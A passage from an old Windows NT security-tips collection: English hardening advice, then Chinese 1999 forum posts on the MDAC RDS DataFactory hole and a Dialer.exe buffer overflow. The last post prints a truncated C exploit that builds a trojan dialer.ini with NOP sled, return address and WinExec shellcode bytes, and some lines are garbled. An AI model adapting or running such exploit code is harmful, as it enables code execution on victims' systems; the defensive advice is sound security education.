babble, this causes possible time needed to crack the password to be extended
considerably. And we're here to tell you, brute force guessing of passwords is one of the most popular ways of penetrating a network today. You may also want to employ the PASSFILT.DLL that comes with SP2 and SP3 - it forces strong password choices on users. Learn more about this .DLL in Microsoft's Knowledge Base article. You'll also find information in the README file accompanying the Service Packs.
3. It's no secret. The default Adminstrator account is a target for most intruders. Create a new administrator account, and take away all permissions from the existing Administrator account. Do this by creating a new user, adding them to the
Administrators group, and duplicating all account policies and permissions granted to the default Adminstrator account. Once finished, go back and remove all rights and permissions from the default Administrator account. But leave it enabled, this way intruders won't know it's crippled until they take the time to actually crack the account.
4.Minimize the number of users that belong to the Administrator's group. Don't ever add someone to this group for the sake of convenience, and check it's membership routinely.
5. Enable auditing on all NT systems. Open the User Manager, and on the Policies | Audit menu, you'll find the account related events that may be audited. By using Explorer (or File Manager) to view properties, you'll be able to establish auditing on media related objects as well.
6. Be careful about establishing NT domain trusts. Things can get out of hand quickly on larger networks with several NT domains. Microsoft has released a Domain
Planning Guide that really helps a lot when designing your domain layouts. Check the MS NT web site for more information on this tool. http://www.microsoft.com/ntserver
7. Disable NetBIOS over TCP/IP network bindings where ever you can - especially on your NICs leading to the Internet, if at all possible.
8. Block all non-essential TCP/IP ports, both inbound and outbound. In particular, at least block UDP ports 137 and 138, and TCP port 139. This may prevent several types of attacks from ever making their way into your network.
9. Revoke the \need to connect to that particular NT system. Those accounts can then only be used to logon on locally.
10. Periodically check your systems for unwanted user accounts. Delete or disable unused accounts. When establishing temporary accounts (for vendors, contractors,
etc), be sure to set an expiration date for the account, and assign rights and permissions carefully.
11. Display a legal notice on your systems that warn each potential user that access to the system is restricted - authorized users only and sessions may be monitored. In some places its against the law to monitor computer sessions - even on your own
network. With the notice, you'll most likely be able to watch an intruder if you need to, without any future legal recourse against you. Do this on your Web site, your FTP server, your NT logon screens (edit the registry), and any place else that provide a means to do so.
12. Make sure your users do not leave their NT workstations turned on and
unattended. Your policies should dictate that screen savers should be activated before leaving a workstation momentarily, and users should logoff when they aren't going to return in a reasonable amount of time. Additionally, depending on your environment, you may want to have a policy mandating that systems be powered off when users leave for the day. This is a good way of helping to prevent unwanted modem dialups and rogue Web and FTP sites as well.
13. The Guest account is created by default with each NT installation. If you do not need to permit Guest users on your system, remove or disable the Guest account, and take the extra time to setup a unique user ID for each person who must access your system temporarily. If you don't want to delete the Guest account, preferring instead to disable it, make certain you check it routinely to ensure it remains disabled.
14. Monitor your networks closely. A large percentage of break-ins occur on networks that were already secure to some extent, but simply weren't monitored closely enough. Use a robust network monitoring package to perform this task for you -- NTManage comes to mind here. You may want to use a realtime attack recognition system, like the upcoming RealSecure from ISS. And, you might want some cool registry, event log, and access control tools, like those found at Somarsoft.
15. Make sure the routers used between your untrusted bordering networks (Internet, etc) can (and are configured to) stop source routing, IP spoofing, and ICMP redirects. And it's also real good to have anti-scanning features too -- all of these items go along way towards stopping some nasty attack mechanisms.
16. Disable the Simple TCP/IP Services (if installed) using Control Panel | Services. This stops the chargen, echo, daytime, discard, and quote of the day (qotd) services. Any of which could be used for denial of service attacks. None of these services are required for proper network operation - although you should be aware that a few types of network monitors occasionally test the echo port when they cannot get a response using ping.
17. Don't run services you don't actually need - more often than not, they're neglected and frequently become the target of attack.
18. Help raise security awareness. Hey, why not start by telling a friend to come visit our site!
NT安全技术Tips之九
关键词:NT, 计算机安全
(原文加贴于1999年7月22日CHINA ASP安全技术版)
MDAC (Microsoft Data Access Components) 对于各位ASP高手来说不是什么新鲜玩意8,呵呵
他能把你的Web和你的数据库服务紧紧地结合。他有一个组建 RDS (Remote Date Services)。 RDS 允许远程用户由Internet通过IIS访问你的数据库,而且在你的安装Optine Pack的时候,他会作为默认安装装到你的服务器上。
RDS有一个组件叫做 DataFactory,他有一个Holes存在,他能使用户: ·在未授权的情况下通过IIS服务发现你未公布的文件
·局域或广域的用户使用ODBC可以进入你的non-public(这个单词不会翻译)服务器并且可以当他attack其他网络的时候可以隐藏他的源地址
而这些仿佛离我们太远,这个报告中最主要的Hole是:
如果你安装了Microsoft JET OLE DB Provider或者Microsoft Datashape Provider,用户能够在服务器上用系统权限使用Shell()--这个VBA命令。(需要了解更多的信息请参考 Microsoft JET Database Engine VBA Vulnerability)
这些弱点结合起来可以让入侵者在你的机器上任意执行系统一级的某些危险命令,太??太??太恐怖了。
需要注意的是,MDAC 2.x并不象以前的版这么容易受攻击,不过升级你以前的版本仍然会遗留后门,所以应该remove再从新安装MDAC。
解决办法:
安装最终版本MDAC 2.1.2.4202.3
http://www.microsoft.com/data/download.htm
如果你安装了MDAC 1.5版或2.X版,而它对于你来说有没有什么实际含义的话 我的建议就是禁止这种服务,删除这个虚拟目录,或者删除下面这些
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters\\ADCLaunch\\RDSServer.DataFactory
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters\\ADCLaunch\\AdvancedDataFactory
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters\\ADCLaunch\\VbBusObj.VbBusObjCls
如果你需要的话,你必须这么做:(当然,我也不会勉强你的) ·禁止匿名用户进入 /msdac 虚拟目录
·自己创建一个handler过滤掉这些请求,当然有教程的落 到http://www.microsoft.com/Data/ado/rds/custhand.htm去看看
或者下载这个文件修改你的注册表,
http://www.microsoft.com/security/bulletins/handsafe.exe
它会将你的注册表的这些地方进行修改!
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory]
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory\\HandlerInfo \\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory\\HandlerInfo\\safeHandlerList
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory\\HandlerInfo\\safeHandlerList\\MSDFMAP.Handler
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory\\HandlerInfo\\safeHandlerList\\MSDFMAP_VB.Handler
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory\\HandlerInfo\\safeHandlerList\\MSDFMAP_VC.Handler
NT安全技术Tips之十
关键词:NT, 计算机安全
(原文加贴于1999年8月4日CHINA ASP安全技术版)
NT下的Dialer.exe是一个电话拨号程序,这次发现的这个Hole会让攻击者在你的服务器上执行一些恐怖的命令??
存在漏洞的版本:
Microsoft Windows NT Workstation 4.0 Microsoft Windows NT Server 4.0
Microsoft Windows NT Server 4.0, Enterprise Edition
Microsoft Windows NT Server 4.0, Terminal Server Edition
当你执行Dialer.exe的时候,他会在dialer.ini中寻找上次拨号的号码,如果这个号码是特别的长的话,嘿嘿??
下面有一断代码能够创建一个特洛伊的dialer.ini,当你执行dialer.exe的时候会让你去执行一个文件名为\的批处理文件,如同执行
Winexec(\,然后ExitProcess(0)。当dialer.ini被特洛伊后,恶意的攻击者能够自己做一个code.bat替换以前的那个code.bat并执行。
这里有一段程序,可以借鉴 #include
int main(void) {
FILE *fd;
char ExploitCode[256]; int count = 0;
while (count < 100) {
ExploitCode[count]=0x90; count ++; }
// ExploitCode[100] to ExploitCode[103] overwrites the real return address // with 0x77F327E5 which contains a \// to our payload of exploit code ExploitCode[100]=0xE5; ExploitCode[101]=0x27; ExploitCode[102]=0xF3; ExploitCode[103]=0x77;
// procedure prologue - push ebp // mov ebp,esp
ExploitCode[104]=0x55; ExploitCode[105]=0x8B;
// This moves into the eax register the address where WinExec() is found // in kernel32.dll at address 0x77F1A9DA - This address has been hard- // coded in to save room rather than going through LoadLibrary() and // GetProcAddress () to get the address - since we've already hard // coded in the return address from kernel32.dll - there seems no // harm in doing this
ExploitCode[106]=0xEC; ExploitCode[107]=0xB8; ExploitCode[108]=0xDA; ExploitCode[109]=0xA9;